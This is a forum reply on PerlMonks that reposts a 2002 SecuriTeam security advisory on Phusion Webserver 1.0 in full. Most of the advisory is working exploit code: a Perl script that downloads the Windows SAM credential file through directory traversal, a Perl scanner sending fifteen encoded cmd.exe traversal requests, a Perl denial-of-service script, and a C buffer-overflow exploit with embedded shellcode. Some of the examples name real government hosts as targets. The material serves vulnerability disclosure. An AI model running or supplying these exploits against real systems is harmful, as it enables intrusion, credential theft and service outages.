Beefy Boxes and Bandwidth Generously Provided by pair Networks
good chemistry is complicated,
and a little bit messy -LW
 
PerlMonks  

Re: Apache(Perl?) error

by Anonymous Monk
on Jan 31, 2003 at 15:49 UTC ( #231648=note: print w/ replies, xml ) Need Help??


in reply to Apache(Perl?) error

http://www.der-keiler.de/Mailing-Lists/Securiteam/2002-02/0104.html

Home > Mailing-Lists > Securiteam > 2002-02 Newsgroups Recommendat +ions Privacy [NT] Phusion Webserver File Viewing, DoS and Arbitr +ary Code Execution Vulnerabilities From: support@securiteam.com Date: 02/17/02 Previous message: support@securiteam.com: "[UNIX] MPG123 Local Buffer +Overflow Vulnerability (Command Line)" Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attac +hment ] ---------------------------------------------------------------------- +---------- From: support@securiteam.com To: list@securiteam.com Date: Sun, 17 Feb 2002 10:51:46 +0100 (CET) The following security advisory is sent to the securiteam mailing list +, and can be found at the SecuriTeam web site: http://www.securiteam. +com - - promotion When was the last time you checked your server's security? How about a monthly report? http://www.AutomatedScanning.com - Know that you're safe. - - - - - - - - - Phusion Webserver File Viewing, DoS and Arbitrary Code Execution Vulnerabilities ---------------------------------------------------------------------- +-- SUMMARY <http://www.bbshareware.com/> Phusion Webserver Server is an Webserve +r for Windows 9x/NT/2000. Multiple security vulnerabilities have been fo +und in the product that allow remote attackers to launch a denial-of-servi +ce, retrieve files that reside outside the normal HTTP bounding directory, + overflow an internal buffer causing it to execute arbitrary code, and execute arbitrary commands (via a directory traversal bug). DETAILS
Vulnerable systems: Phusion Webserver version 1.0 Directory Traversal: The security vulnerability is exploitable by using a specially crafted + URL composed of triple dot ".../" directory traversal sequences, with HTTP + encoded character representations substituted for "/" and "\". Example: http://www.example.com/.../.../.../.../test.txt DoS attack: The server crashes after receiving a very long URL: Example: http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA Buffer overflow: By issuing a long GET HTTP request, it is possible to cause the produc +t to overflow an internal buffer causing it to execute arbitrary commands: Example: http://10.0.0.1/AAAAAAAAA...(Ax2500)...AAA Arbitrary command execution: By using a GET HTTP request prefixed with a '/cgi-bin/' directory it i +s possible to execute arbitrary command by requesting the 'cmd.exe' executable (similar to the IIS security vulnerability). Example: http://10.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ Exploit (Directory Traversal): #!/usr/bin/perl # # THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN # # Simple script to get files on server. # # Maybe u need this line for windows: # #! c:\perl\bin\perl.exe # # Phusion Webserver v1.0 proof-of-concept exploit. # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion-GET.pl <And read the Intructions> # # print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); print <<"EOT"; Please type the address remote webserver, example: www.whitehouse.gov [Default remote Webserver is "127.0.0.1"`]: EOT $host = <>; print <<"EOT"; Please type only in the directory where the file is located you want t +o download, example: /winnt/repair/ [default directory is "/winnt/repair/"] :#For IIS 4-5 EOT $directory = <> || "/winnt/repair/"; print <<"EOT"; Please type in the filename you want download example: sam._ [default file is "sam._"] : EOT $file = <> || "sam._"; { #Maybe u to change this line depending of PATH installation. system("explorer.exe", "http://$host:80/../../..$directory$file"); } print <<"EOT"; HAVE Fun!. ;-) EOT Exploit (Directory Traversal, Command Execution): #!/usr/bin/perl # # Simple script to identify if the host is vulnerable!, # # This does 15 different checks based IIS 4-5. Have Fun! # # Phusion Webserver v1.0 proof-of-concept exploit # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion_exp.pl <Hosts>:<Port> # # Example: # # perl -x Phusion_exp.pl www.whitehouse.com:80 # Trying..................... # # <THIS HOST IS VULNERABLE> :-) # Check the previous notes to execute bugs. # # use Socket; if ($#ARGV<0) {die " \nPhusion Webserver v1.0 traversal exploit(c)2002. Alex Hernandez al3xhernandez\@ureach.com\n Usage: perl -x $0 www.whitehouse.com:80 {OR}\n [if the host is not usi +ng a proxy]\n Usage: perl -x $0 127.0.0.1:80\n\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Trying.....................\n"; $target = inet_aton($host); $flag=0; # ---------------test method 1 my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c ++dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 2 my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 3 my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c ++dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 4 my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c ++dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 5 my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c ++dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 6 my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c ++dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 7 my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c ++dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 8 my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c ++dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 9 my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c ++dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 10 my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n" +); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 11 my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 12 my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 13 my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 14 my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../ winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 15 my @results=sendraw("GET /.../.../.../.../winnt/system32/cmd.exe\?/c\+ +dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} #------------------------------ if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n Check the previous notes to execute bugs\n";} else {print "<THIS HOST IS NOT VULNERABLE> :-( \n Check manually on browser...\n";} sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect check the port or address...\n"); +} } Exploit (DoS): #!/usr/bin/perl # # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # Phusion Webserver v1.0 proof-of-concept exploit. # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion_DoS.pl -s <server> # # Example: # # perl -x Phusion_DoS.pl -s 10.0.0.1 # # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); $def = "A"; $num = "3000"; $data .= $def x $num; $serv = $args{s}; $port = 80; $buf = "GET /cgi-bin/$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("\nCrash was successful !\n\n"); sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} Exploit (Buffer overflow): /** Phusion-Overun.c ** -Remote exploit for Phusion Webserver v1.0 for WinNT. ** ** Phusion Webserver v1.0 exploit gets remote servers's full control. ** When you attacks a vulnerable server you can run abitrary code ** inside. ** ** Phusion Webserver v1.0 proof-of-concept exploit. ** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. ** ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, ** G.Maggiotti & H.Oliveira. ** ** ** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c ** ** Usage: ./Phusion-ovrun <hostname> ** ** ** ** **/ #include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/errno.h> #include <netdb.h> #define _PORT 80 #define _X 10000 char runcrash[] = "GET /" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10" "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50" "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18" "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b" "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9" "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99" "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9" "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99" "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02" "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e" "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65" "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca" "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5" "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee" "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9" "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9" "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed" "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5" "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc" "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc" "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed" "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9" "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9" "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9" "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9" "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb" "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7" "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0" "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7" "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9" "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7" "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3" "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7" "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8" "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7" "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3" "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7" "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc" "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc" "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6" "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc" "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3" "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01"; int sock; struct sockaddr_in sock_a; struct hostent *host; int main (int argc, char *argv[]) { printf("\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\n +"); printf("Alex Hernandez al3xhernandez@ureach.com\n\n"); if(argc < 2) { fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]); exit(0); } if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(-1); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("create socket"); exit(-1); } sock_a.sin_family=AF_INET; sock_a.sin_port=htons(_PORT); memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length); if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) { perror("create connect"); exit(-1); } fflush(stdout); write(sock,runcrash,_X); write(sock,"\n\n", 2); printf("done.\n\n"); } ADDITIONAL INFORMATION The information has been provided by <mailto:al3xhernandez@ureach.com> + Alex Hernandez. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and + body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email t +o: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty +of any kind. In no event shall we be liable for any damages whatsoever including di +rect, indirect, incidental, consequential, loss of business profits o +r special damages. ---------------------------------------------------------------------- +---------- Previous message: support@securiteam.com: "[UNIX] MPG123 Local Buffer +Overflow Vulnerability (Command Line)" Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attac +hment ] Home > Mailing-Lists > Securiteam > 2002-02 Newsgroups Recommendat +ions Privacy ---------------------------------------------------------------------- +---------- Contact: security@der-keiler.de This document was last modified: 10/13/02 01:49 CEST ---------------------------------------------------------------------- +---------- Thanks: According to Alexa.com, www.der-keiler.de is now one of the 100.000 mo +st visited sites on the internet. We would like to thank all faithful visitors who made this possible.


Comment on Re: Apache(Perl?) error
Select or Download Code

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: note [id://231648]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others cooling their heels in the Monastery: (9)
As of 2014-10-25 11:33 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    For retirement, I am banking on:










    Results (143 votes), past polls